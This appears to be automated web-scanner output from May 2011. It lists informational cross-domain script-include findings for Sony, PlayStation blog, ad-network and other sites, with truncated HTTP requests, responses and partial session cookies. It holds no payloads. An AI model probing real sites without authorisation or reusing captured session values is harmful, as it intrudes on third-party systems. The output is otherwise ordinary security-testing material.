GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TS5bbf46=7383fa36127 |
HTTP/1.1 200 OK Cteonnt-Length: 105431 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 105431 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:21:13 GMT Connection: close Set-Cookie: WC_PERSISTENT=CBnCTN Set-Cookie: WC_USERACTIVITY_239700472 Set-Cookie: WC_ACTIVEPOINTER=%2d1 Set-Cookie: WC_USERACTIVITY_239700473 Set-Cookie: TS5bbf46=394e9935c8a Cache-Control: private Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: No-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.ensighten </script> ...[SNIP]... <li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook <li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter ...[SNIP]... <li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube <li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servic ...[SNIP]... <li id="readerSpot" class="entBigPromo seoImg"> <a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore <h3> ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us ...[SNIP]... <li id="sonyCameraClubSpot" class="comBigPromo seoImg"> <a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr <h3> ...[SNIP]... <li id="twitterSpot" class="comBigPromo seoImg"> <a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com <h3> ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Facebook" href="http://www.facebook ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Twitter" href="http://www.twitter ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: YouTube" href="http://www.youtube ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Sales Support" href="http://esupport ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Online Product Support" href="http://esupport ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Technical Support" href="http://esupport ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Replacement Parts" href="https://servic ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Product Registration" href="https://produc ...[SNIP]... <p class="arrow_link">For service plan information on professional camcorders, please <a href="http://pro.sony.com ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook <li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter ...[SNIP]... <li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube <li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <div id="globalLogoCallou <a href="http://www.sony.net <a href="http://www.sony.com ...[SNIP]... <li class="extraLinkListItem lastLinkItem"><a href="http://products.sel ...[SNIP]... <noscript><img src="https://sonysscom height="1" width="1" border="0" alt="" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: TS5bbf46=3693d43bbe0 |
HTTP/1.1 200 OK ntCoent-Length: 91771 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 91771 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:19:46 GMT Connection: close Cache-Control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.ensighten </script> ...[SNIP]... <li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook <li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter ...[SNIP]... <li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube <li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servic ...[SNIP]... <li id="readerSpot" class="entBigPromo seoImg"> <a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore <h3> ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us ...[SNIP]... <li id="sonyCameraClubSpot" class="comBigPromo seoImg"> <a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr <h3> ...[SNIP]... <li id="twitterSpot" class="comBigPromo seoImg"> <a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com <h3> ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Facebook" href="http://www.facebook ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Twitter" href="http://www.twitter ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: YouTube" href="http://www.youtube ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Sales Support" href="http://esupport ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Online Product Support" href="http://esupport ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Technical Support" href="http://esupport ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Replacement Parts" href="https://servic ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Product Registration" href="https://produc ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook <li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter ...[SNIP]... <li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube <li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <div id="globalLogoCallou <a href="http://www.sony.net <a href="http://www.sony.com ...[SNIP]... <li class="extraLinkListItem lastLinkItem"><a href="http://products.sel ...[SNIP]... <noscript><img src="https://sonysscom height="1" width="1" border="0" alt="" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.sonystyle.com Cookie: TS5bbf46=f5a3eb9e27e |
HTTP/1.1 200 OK ntCoent-Length: 87984 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 87984 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:24:04 GMT Connection: keep-alive Cache-Control: private Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: No-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.ensighten </script> ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servic ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Replacement Parts" href="https://servic ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Product Registration" href="https://produc ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <noscript><img src="https://sonysscom height="1" width="1" border="0" alt="" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: http://www.sonystyle.com Cookie: TS5bbf46=b8fba18f1f5 |
HTTP/1.1 200 OK ntCoent-Length: 4641 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 4641 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:22:00 GMT Connection: keep-alive Set-Cookie: WC_AUTHENTICATION Set-Cookie: TS5bbf46=59f0262ca39 Cache-Control: private Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta id="meta_refresh" ht ...[SNIP]... <noscript><img src="https://sonysscom height="1" width="1" border="0" alt="" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.sonystyle.com Cookie: TS5bbf46=b8fba18f1f5 |
HTTP/1.1 200 OK Cteonnt-Length: 91796 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 91796 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:22:06 GMT Connection: keep-alive Cache-Control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.ensighten </script> ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servic ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Replacement Parts" href="https://servic ...[SNIP]... <li class="catItem"> <a class="catItemLink" rel="Support: Product Registration" href="https://produc ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <li id="" class="footerDirecto ...[SNIP]... <noscript><img src="https://sonysscom height="1" width="1" border="0" alt="" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3941.InviteMedia |
GET /adi/N3941.InviteMedia Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 8329 Date: Mon, 16 May 2011 01:27:08 GMT Cache-Control: private, x-gzip-ok="" <html><head><title ...[SNIP]... <!-- Code auto-generated on Tue Mar 29 11:15:57 EDT 2011 --> <script src="http://s0.2mdn.net ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/ta.cc.com.s/disney |
GET /adi/ta.cc.com.s/disney Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cruisecritic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4789 Date: Mon, 16 May 2011 01:20:34 GMT Cache-Control: private, x-gzip-ok="" <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2594 Template Name = Banner Creative (Flash ...[SNIP]... <!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /server/ads.js |
GET /server/ads.js?pub Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: public Cache-Control: max-age=172800 Cache-Control: must-revalidate Expires: Wed, 18 May 2011 01:40:38 GMT Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:40:38 GMT; Path=/ Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: adImpCount=z8H5DIFkJ Set-Cookie: fc=VBzn51JQz0zltCfNS Set-Cookie: pf=_ueUnCc1-Qecqj3JV Content-Type: text/javascript;charset Vary: Accept-Encoding Date: Mon, 16 May 2011 01:40:38 GMT Content-Length: 11133 var detect = navigator.userAgent function checkIt(string) { return detect.indexOf(string) >= 0; } var naturalImages = new Array; naturalImageOnLoad = function() { if (this.width ...[SNIP]... cjJBgtabbvXcUHzHk2Ua ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://blog.us.plays |
Path: | / |
GET / HTTP/1.1 Host: blog.us.playstation.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mbox=check#true |
HTTP/1.1 200 OK Server: nginx Date: Sun, 15 May 2011 20:26:34 GMT Content-Type: text/html; charset=UTF-8 Cneonction: close Vary: Cookie Last-Modified: Sun, 15 May 2011 20:21:54 +0000 Cache-Control: max-age=20, must-revalidate X-Pingback: http://blog.us.plays X-hax0r: sean at voce connect Content-Length: 71106 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel='stylesheet' id='wp-postratings-css' href='http://blog.us <script type='text/javascript' src='http://ajax ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://blog.us.plays |
Path: | /2011/04/26/update-on |
GET /2011/04/26/update-on Host: blog.us.playstation.com Proxy-Connection: keep-alive Referer: http://us.playstation.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: APPLICATION_SITE_URL=http |
HTTP/1.1 200 OK Server: nginx Date: Sun, 15 May 2011 20:29:54 GMT Content-Type: text/html; charset=UTF-8 Cneonction: close Vary: Cookie Last-Modified: Sun, 15 May 2011 20:27:46 +0000 Cache-Control: max-age=172, must-revalidate X-Pingback: http://blog.us.plays Link: <http://blog.us X-hax0r: sean at voce connect Content-Length: 82583 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel='stylesheet' id='wp-postratings-css' href='http://blog.us <script type='text/javascript' src='http://ajax ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://cdn5.tribalfusion |
Path: | /media/1956006/frame.html |
GET /media/1956006/frame.html HTTP/1.1 Host: cdn5.tribalfusion.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: ANON_ID=aqnu7qmMZaEv |
HTTP/1.1 200 OK P3p: CP="NOI DEVo TAIa OUR BUS" X-Function: 301 Content-Length: 98 Last-Modified: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html Date: Sun, 15 May 2011 21:31:35 GMT Connection: close Vary: Accept-Encoding Expires: Tue, 31 Dec 2030 00:00:00 GMT Expires: Tue, 31 Dec 2030 00:00:00 GMT Cache-Control: public <script type="text/javascript" src="http://adadvisor.net |
Severity: | Information |
Confidence: | Certain |
Host: | http://cplads.appspot.com |
Path: | /ad_tag/three_pas |
GET /ad_tag/three_pas Host: cplads.appspot.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Date: Mon, 16 May 2011 01:24:45 GMT Server: Google Frontend Content-Length: 125 <script language="javascript" src="http://www.inadcoads |
Severity: | Information |
Confidence: | Certain |
Host: | http://disneycruise |
Path: | /reservations/customize |
GET /reservations/customize Host: disneycruise.disney.go Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=854018943 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html Vary: Accept-Encoding Date: Mon, 16 May 2011 01:29:41 GMT Set-Cookie: DCL_POOL=1;path=/; Set-Cookie: dcl_i_persistence=H Content-Length: 63930 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... </script> <script src="http://dcl2 <script src="http://dcl <script src="http://dcl2 <script src="http://dcl <script src="http://dcl2 ...[SNIP]... </div> <script src="http://dcl2 <script src="http://dcl ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /activityi |
GET /activityi;src=1715989 Host: fls.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.acehardware User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK X-Frame-Options: ALLOWALL Server: Floodlight Date: Mon, 16 May 2011 01:42:51 GMT Expires: Mon, 16 May 2011 01:42:51 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Content-Type: text/html Content-Length: 1023 X-XSS-Protection: 1; mode=block <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... </script> <script type="text/javascript" src="https://r.turn.com </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /activityi |
GET /activityi;src=1564432 Host: fls.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.helzberg.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK X-Frame-Options: ALLOWALL Server: Floodlight Date: Mon, 16 May 2011 01:40:47 GMT Expires: Mon, 16 May 2011 01:40:47 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Content-Type: text/html Content-Length: 2464 X-XSS-Protection: 1; mode=block <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... </script> <script type="text/javascript" src="http://www </script> ...[SNIP]... </noscript><script src="http://action ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /activityi |
GET /activityi;src=1774243 Host: fls.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.travelguard User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK X-Frame-Options: ALLOWALL Server: Floodlight Date: Mon, 16 May 2011 01:44:06 GMT Expires: Mon, 16 May 2011 01:44:06 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Content-Type: text/html Content-Length: 1893 X-XSS-Protection: 1; mode=block <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... </script> <script type="text/javascript" src="https://www </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /pagead/ads |
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Mon, 16 May 2011 01:32:38 GMT Server: cafe Cache-Control: private Content-Length: 2045 X-XSS-Protection: 1; mode=block <html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script ...[SNIP]... </script><script type="text/javascript" src="http://ad.turn.com ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /pagead/ads |
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Mon, 16 May 2011 01:20:08 GMT Server: cafe Cache-Control: private Content-Length: 4679 X-XSS-Protection: 1; mode=block <html><head><style><!-- a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!-- (function(){window.ss ...[SNIP]... </script><script src="http://pagead2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /pagead/ads |
GET /pagead/ads?client=ca-pub Host: googleads.g.doubleclick Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Mon, 16 May 2011 01:20:08 GMT Server: cafe Cache-Control: private Content-Length: 10190 X-XSS-Protection: 1; mode=block <!doctype html><html><head><style>a ...[SNIP]... </script><script src="http://pagead2 ...[SNIP]... </script><script src="http://pagead2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://i.usatoday.net |
Path: | /_common/_scripts/_oas |
GET /_common/_scripts/_oas Host: i.usatoday.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Thu, 07 Apr 2011 16:15:55 GMT Accept-Ranges: bytes ETag: "ff0e5123ff5cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Content-Length: 2693 Date: Mon, 16 May 2011 01:19:40 GMT Connection: close Vary: Accept-Encoding var afs_num_top_ads = 3; var afs_top_ads = ""; var afs_bottom_ads = ""; function GetParam(name) { var match = new RegExp("[\?&]" + name + "=([^&]+)", "i").exec(location.search if (match ...[SNIP]... populate an array * of ad objects. Once that array has been populated, * the JavaScript will call the google_afs_request_done * function to display the ads. */ document.write('<script type="text/javascript" src="http://pagead2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /trends |
GET /trends HTTP/1.1 Host: pastebin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive |
